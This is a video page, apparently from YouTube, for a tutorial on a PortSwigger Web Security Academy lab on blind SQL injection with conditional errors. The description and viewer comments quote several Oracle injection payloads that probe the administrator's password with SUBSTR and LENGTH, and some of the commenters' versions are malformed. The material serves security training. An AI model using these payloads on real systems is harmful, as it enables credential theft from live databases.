SQL Injection - Lab #12 - Blind SQL injection with conditional errors
HTML-код
- Опубликовано: 28 сен 2024
- In this video, we cover Lab #12 in the SQL injection track of the Web Security Academy. This lab contains a blind SQL injection vulnerability. To solve the lab, we perform a blind based SQL injection attack on the database that retrieves the password of the administrator user on the application.
▬ ✨ Support Me ✨ ▬▬▬▬▬▬▬▬▬▬
Buy my course: academy.ranakh...
▬ Links ▬▬▬▬▬▬▬▬▬▬
Long video: • SQL Injection - Lab #1...
SQL injection Lab #11 video (previous video): • SQL Injection - Lab #1...
SQL Injection | Complete Guide (theory video): • SQL Injection | Comple...
Notes.txt document: github.com/rkh...
Web Security Academy Video Release Schedule: docs.google.co...
Web Security Academy: portswigger.ne...
Rana's Twitter account: / rana__khalil
Interested in supporting me and gaining early access to the Web Security Academy videos when they're recorded? Consider buying my course: academy.ranakhalil.com/p/web-security-academy-video-series! ✨ ✨
After recording the video, I realized the SQL payload can be much more simple. We don't need a CASE expression in order for it to work. The following is the alternative payload:
' || (select TO_CHAR(1/0) FROM users WHERE username='administrator' and SUBSTR(password,1,1)='a')|| '
Great Video. Can we use AND instead of concatenation? i am unable to understand that why haven't we used AND
@@ahmedsaleem9327 Yes. AND works as well.
How does this ' || (select TO_CHAR(1/0) FROM users WHERE username='administrator' and SUBSTR(password,1,1)='a')|| ' --- works exactly?
I mean, i think that if the SUBSTR is true then you will select the 1/0 and get the error message, which is what we want.
But in the case that the password 1,1 is not A, then the clause is False, which is also leading to error, right?
So how does this works?
Noticed that there were a couple people who were wondering why the solution for this lab uses concatenation:
Doesn't matter what technique you use, this lab simply introduces a new technique that uses string concatenation instead of an equality check. You could just as easily do this lab using previous techniques.
Eg.
Instead of:
'||(SELECT CASE WHEN (1=2) THEN to_char(1/0) ELSE '' END FROM dual)||'
We could have:
' AND (SELECT CASE WHEN (1=2) THEN to_char(1/0) ELSE '' END FROM dual)=''--
Concatenation simply leads to a more simple solution in this case, so it is quicker to use.
||(select+username+from+users+where+username%3d'administrator')|| this statment doesnt gives an internal error that means administrator exits in the table right ?
@@anirudhsaxena9214 i guess the purpose here is to get an error if you do not get it so the condition is true and passe to the second part of the condition -->' ' =blank
It means that every think is alright and the administrator user does not exist.
could we use the same payload as the previous video instead of trying to do 1/0 or case keyword? for example we did "and (select username from users where username = 'administrator') = 'administrator'--" wouldnt this work here as well? if not why?
Hi, can you please tell why did we need to use the concatenate operator in this case
and why we didn't use the comment operator to ignore the apostrophe.
تقدر تعملها ب AND تقريبا مش هتفرق كثير بس ده تكنيك تاني
Great stuff Rana. I bought your course to support you! Thank you for your time on these videos...
Thank you for your support!
Amazing explanation of why the query for finding if the admin user exists works. Keep it up 👆 !
Great work, your videos are really helpful.
I just didn't understand why you decided to concatenate? Is this an obvious move for Blind SQLi?
Hey, I have a question. Since in this case it's an Oracle database, not knowing the syntax, after having found the parameter vulnerable to injection and having made sure that it was vulnerable by seeing if it interpreted what was passed as a query, I passed everything to the sqlmap obviously specifying the injection point, is this a good thing in your opinion?
Salamu Alaykoum Rana how are you?
what an amazing walk through you make it as it was so easy!
Unbelievable skills.
Thank you by the way.
Do you recommend learning SQL?
I don't have much SQL Knowledge.
Thank you again.
i barely understood the logic of this kind of sql injection in Oracle ...but what i would like to know if there is the same trigerreing errors for sql database ?
nice explanations , waiting for the rest of the videos also
Here's a very peculiar error-
'|| (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>100) ||--
Using comments at the end with the concatenation doesn't work. However what does work is using comments without the concatenation string:
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>100) --
Anyone know why that is?
tks, amazing video!!
can someone explain me the significance of ' ' not ' please i am confused in that
I guess the ' ' means that every thing is ok and does not display any message if the first condition is true..
So it returns https 200
Great!
Why are your using solutions that go more inline with what the labs are teaching. There’s no way a beginner is going to know all of these different commands you are using.
I did the lab before this one called "Blind SQL injection with conditional responses". I didn't have to concatenate in that lab. I am not sure why concatenation was necessary in this lab. Can you explain?
Why cant we follow the same steps here what we follow in Blind SQLi with conditional response , because the difference of conditional error and response is that there if true we get WELCOME message else NO MESSAGE but here if true NO ERROR else ERROR. TYIA
same question
I guess because the DB is Oracle based
Excellent video.
My eWPT cert is in 4 weeks, so can't thank you enough for your videos & effort of quality educationally content you put out.
Method I found I'm able to learn, regardless of it being tedious ( the method, not content ), it allows retention for those struggling with the information sticking, because this stuff is hard lol but you've done us a great service:
Method:
1. Solo Attempt
2. Watch Video ( as a lecture )
3. Re-Attempt ( still without video )
4. Complete with Video ( side by side )
5. 3rd Attempt (without the video )
did you pass bro?
I had hard time understanding why we still get an error while 1=1 and we have a user called administrator. Then you explained how SQL queries worked and bingo! I instantly understood! Thank you so much!!
Hi, Ms. Khalil. Can you help me figure out the difference between conditional response and conditional errors in SQL Injection, please? This confused me. Thanks.
someone can explain to me why this challenge don't use this -- at the end of a sentence like other challenges
we can perform this attack's using ffuf tool
Eagerly waited for your walkthrough
did you just reupload this?
Nope. This is the short version that will be linked to from the official Web Security Academy website.
How i'Know the Type of database ?
it took me three days to solve this lab😅😅😅
Why we cant use AND statements in this scenario too like previous lab was pretty similar to this so why cant we use AND statements
Thanks
Hey Rana, Thanks for that amazing video explanation!
Can you please explain how the function of 'TO_CHAR' is manifested on the query?
Hi Rana
Thanks for sharing such helpful videos but I need your help with this challenge
I am using the below query to find the password length
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>1) ||
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>50) ||
In both cases I am getting 500 response
I am following the same steps which you have did in this video, can you please help me in this issue
Have you closed the query? From what you've posted, the syntax is wrong. You've an open quote-mark, but haven't closed it. Either add a single quote to comment out after the length function without concatenation.
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>1) || '
or
' || (select CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users where username = 'administrator' and LENGTH(password>1) --
Just add ' at the end of the query
hi @rana Khali, I do watched your basic video, in previous video we used conditional responses and now we are using different one., can we use old method as well?
how to exploit database MYSQL ? please give me video for exploit database mysql 🙏
Perfect, love your detailed explanations! Thank you ☺ 🙏
Thanks for this Ms.Khalil
It will be really helpful if you could make a video to get a clear idea on DOM xss
Thank you so much for these videos, they are easy to understand and learn!
Underrated channel👏
08:30 i didn't understand why it doesn't work without rownum and why we used the rownum=1
because the query will return ' ' for every entity in the users table, the returned query will be like this for example if there are 3 users:
row Num |
1 | ' '
2 | ' '
3 | ' '
it is important to note that by i mean the ' ' in the select statement (select ' ' from users)
Great video. Its really refreshing listening to a female voice in pentesting videos. So much nicer on the ears :) Also your explanations are on point and simple to understand. Keep it up :)